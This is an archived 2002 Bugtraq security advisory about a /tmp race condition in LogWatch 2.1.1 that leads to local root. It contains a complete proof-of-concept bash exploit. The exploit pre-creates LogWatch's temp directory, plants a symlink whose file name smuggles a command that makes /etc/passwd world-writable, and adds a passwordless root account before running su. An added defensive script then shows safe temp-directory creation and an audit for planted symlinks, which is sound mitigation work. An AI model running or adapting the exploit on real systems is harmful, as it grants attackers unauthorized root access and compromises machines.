8208133 2002-03-27 03:16 +0100  /110 lines/ Spybreak <spybreak@host.sk>
Sent by: joel@lysator.liu.se
Imported: 2002-03-27  19:53  by Brevbäraren
External recipient: bugtraq@securityfocus.com
External copy recipient: vuln-dev@securityfocus.com
Recipient: Bugtraq (import) <21599>
Subject: Root compromise through LogWatch 2.1.1
------------------------------------------------------------
From: "Spybreak" <spybreak@host.sk>
To: bugtraq@securityfocus.com
Cc: vuln-dev@securityfocus.com
Message-ID: <20020327031626.M78748@host.sk>

Release  : March 27 2002
Author   : Spybreak <spybreak@host.sk>
Software : LogWatch
Version  : 2.1.1
Homepage : www.kaybee.org/~kirk/html/linux.html
Problems : A /tmp race condition leads to root
 



--- INTRO ---

LogWatch is a customizable log analysis system. LogWatch parses
your system's logs for a given period of time and creates a
report analyzing the areas that you specify, in as much detail as you
require.

The collected results are reported to a chosen e-mail address,
root by default.

LogWatch 2.1.1 is part of the Red Hat Linux 7.2 distribution,
enabled by default and run daily by the cron daemon.


--- PROBLEM ---

On a system running LogWatch, a local user is able to gain
unauthorized root access because of a race condition in the
creation of LogWatch's temporary directory.

--- EXPLOIT ---

cat > logwatch211.sh <<EOF

#!/bin/bash
#
# March 27 2002
#
# logwatch211.sh
#
# Proof of concept exploit code
# for LogWatch 2.1.1
# Waits for LogWatch to be run then gives root shell
# For educational purposes only
#
# (c) Spybreak <spybreak@host.sk>


SERVANT="00-logwatch" # Logwatch's cron entry
SCRIPTDIR=/etc/log.d/scripts/logfiles/samba/

echo
echo "LogWatch 2.1.1 root shell exploit"
echo '(c) Spybreak <spybreak@host.sk>'
echo
echo "Waiting for LogWatch to be executed"
 
while :; do
  set `ps -o pid -C $SERVANT`
    if [ -n "$2" ]; then
      mkdir /tmp/logwatch.$2   
      ln -s $SCRIPTDIR'`cd etc;chmod 666 passwd #`' /tmp/logwatch.$2/cron
      break;
    fi
done
echo "Waiting for LogWatch to finish its work"
while :; do
  set `ps -o pid -C $SERVANT`
    if [ -z "$2" ]; then
      ls -l /etc/passwd|mail root
      echo master::0:0:master:/root:/bin/bash >> /etc/passwd
      break;
    fi
done
su master  
  
EOF
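As an added example for this advisory (not the author's exploit and not LogWatch's own code), the following POSIX shell script shows the defender's side of the race described in the PROBLEM section: safe_tmpdir creates the per-run directory with mktemp -d instead of a name derived from the process id and verifies it before use, and audit_tmpdirs reports pre-created logwatch.* entries in a temp parent that are symlinks, are owned by another user, or have been seeded with a symlink such as the cron link the exploit plants. Only the "logwatch." prefix comes from the advisory; the function names and the sample tree built by build_sample_tree are constructed for this example.

```shell
#!/bin/sh
# Added example for this advisory; not the author's exploit and not
# LogWatch's own code. Two defender-side helpers for the predictable
# /tmp/logwatch.<pid> directory race described in the PROBLEM section:
#
#   safe_tmpdir PREFIX [PARENT]   mitigation: create the per-run directory
#                                 atomically with mktemp -d and verify it.
#   audit_tmpdirs PREFIX [PARENT] detection: report PREFIX.* entries that
#                                 are symlinks, are owned by someone else,
#                                 or contain a symlink (the pre-created
#                                 directory pattern used in the exploit).
#
# Only the "logwatch." name prefix comes from the advisory; the function
# names and the sample tree built by build_sample_tree are constructed.

set -u

# Prints the path of a freshly created private directory, or fails.
safe_tmpdir() {
    prefix=$1
    parent=${2:-${TMPDIR:-/tmp}}
    # mktemp -d chooses an unpredictable suffix and creates the directory
    # (mode 0700) in a single step, so there is no name an attacker can
    # pre-create, unlike one derived from the process id.
    dir=$(mktemp -d "$parent/$prefix.XXXXXX") || return 1
    # Verify what we got before trusting it: a real directory, not a
    # symlink, owned by us. (-O is supported by bash, dash and busybox.)
    if [ -L "$dir" ] || [ ! -d "$dir" ] || [ ! -O "$dir" ]; then
        printf 'refusing suspicious temp dir: %s\n' "$dir" >&2
        return 1
    fi
    printf '%s\n' "$dir"
}

# Prints one line per suspicious entry; always returns 0.
audit_tmpdirs() {
    prefix=$1
    parent=${2:-${TMPDIR:-/tmp}}
    for entry in "$parent/$prefix".*; do
        # An unmatched glob is left as the literal pattern; skip it.
        [ -e "$entry" ] || [ -L "$entry" ] || continue
        if [ -L "$entry" ]; then
            printf 'SYMLINK  %s\n' "$entry"
        elif [ ! -O "$entry" ]; then
            printf 'FOREIGN  %s (owned by another user)\n' "$entry"
        elif [ -d "$entry" ] && \
             [ -n "$(find "$entry" -type l -print 2>/dev/null | head -n 1)" ]; then
            printf 'PLANTED  %s (contains a symlink)\n' "$entry"
        fi
    done
    return 0
}

# Number of findings, for scripting and for checks.
count_findings() {
    audit_tmpdirs "$@" | grep -c . || true
}

# Constructed sample tree: one directory seeded with a "cron" symlink the
# way the exploit does, one clean directory, and one bare symlink.
build_sample_tree() {
    parent=$1
    mkdir -p "$parent/logwatch.1234" "$parent/logwatch.5678"
    ln -s ../not-a-real-target "$parent/logwatch.1234/cron"
    : > "$parent/logwatch.5678/cron"
    ln -s ../elsewhere "$parent/logwatch.link"
}

# Stand-alone demo against a scratch parent directory, never the real /tmp.
scratch=$(mktemp -d)
build_sample_tree "$scratch"
audit_tmpdirs logwatch "$scratch"
safe_tmpdir logwatch "$scratch"
rm -rf "$scratch"
```

Run as-is to see the audit output for the constructed tree; pointing audit_tmpdirs logwatch /tmp at the real /tmp checks a host. The ownership check (-O) cannot be exercised without a second user, so the constructed tree only triggers the two symlink cases.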
      
(8208133) /Spybreak <spybreak@host.sk>/-------------